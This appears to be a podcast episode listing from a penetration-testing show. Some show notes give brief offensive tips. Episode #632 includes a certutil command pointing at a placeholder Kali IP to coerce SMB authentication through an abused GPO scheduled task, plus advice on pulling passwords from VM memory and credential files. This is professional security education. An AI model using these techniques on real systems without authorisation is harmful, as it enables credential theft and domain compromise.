• 7MS #639: Tales of Pentest Pwnage - Part 62
    Sep 3 2024

    Today’s tale of pentest pwnage talks about the dark powers of the net.py script from impacket.

    7 mins
  • 7MS #638: Tales of Pentest Pwnage – Part 61
    Aug 23 2024

    Today we’re talking pentesting – specifically some mini gems that can help you escalate local/domain/SQL privileges:

    • Check the C: drive! If you get local admin and the system itself looks boring, check the root of C: – it might have some interesting scripts or folders with tools that have creds in them.
    • Also look at Get-ScheduledTask
    • Find ids and passwords easily in Snaffler output with this Snaffler cleaner script
    • There’s a ton of gold to (potentially) be found in SQL servers – check out my notes on using PowerUpSQL to find misconfigs and agent jobs you might be able to abuse!
    33 mins
  • 7MS #637: BPATTY[RELOADED] Release Party
    Aug 17 2024

    Hello friends, I’m excited to release BPATTY[RELOADED] into the world at https://bpatty.rocks! – which stands for Brian’s Pentesting and Technical Tips for You! It’s a knowledge base of IT and security bits that help me do a better job doing security stuff! Today I do an ACTUAL 7-minute episode (GASP…what a concept!) covering my favorite bits on the site so far. Enjoy!

    7 mins
  • 7MS #636: A Prelude to BPATTY(RELOADED)
    Aug 12 2024

    Artificial hype alert! I’m working on a NEW version of BPATTY (Brian’s Pentesting and Technical Tips for You), but it is delayed because of a weird domain name hostage negotiation situation. It’s weird. But in the meantime I want to talk about the project (which is a pentest documentation library built on Docusaurus) and how I think it will be bigger/better/stronger/faster/cooler than BPATTY v1 (which is now in archive/read-only mode).

    11 mins
  • 7MS #635: Eating the Security Dog Food - Part 7
    Aug 3 2024

    Today we’re talking about eating the security dog food – specifically:

    • Satisfying critical security control #1
    • Using the Atlassian family of tools to create a ticketing/change control system and wrap it into an asset inventory
    • Leveraging Wazuh as a security monitoring system (with eventual plans to leverage its API to feed Atlassian inventory data)
    45 mins
  • 7MS #634: Tales of Pentest Pwnage - Part 60
    Jul 26 2024

    Hi, today’s tale of pentest pwnage covers a few wins and one loss:

    1. A cool opportunity to drop Farmer “crops” to a domain admin’s desktop folder via PowerShell remote session
    2. Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile
    3. Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login
    33 mins
  • 7MS #633: How to Create a Security Knowledgebase with Docusaurus
    Jul 19 2024

    Hey friends, we’re doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus! It’s cool, it’s free, it’s from Meta and you can get up and going in just a few commands – check out their getting started guide to get rockin’ in about 5 minutes. Important files include:

    • docusaurus.config.js – for setting the site title and key config settings
    • sidebars.js – used to create/edit navigation bar menus
    • /src/css/custom.css – to style the site
    14 mins
  • 7MS #632: Tales of Pentest Pwnage – Part 59
    Jul 12 2024

    Today’s tale of pentest pwnage includes some fun stuff, including:

      • SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address. When you’re ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder.
      • I’m not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you’re on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under.
      • DonPAPI got an upgrade recently with a focus on evasion!
      • When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you’ve got the vmss2core utility, which I couldn’t find anywhere except the Internet Archive. Then I really like to follow this article to pull passwords from VM memory dumps.
      • Can’t RDP into a victim system that you’re PSRemote’d into? Maybe RDP is listening on an alternate port! Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" | select-object portnumber

    And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!

    48 mins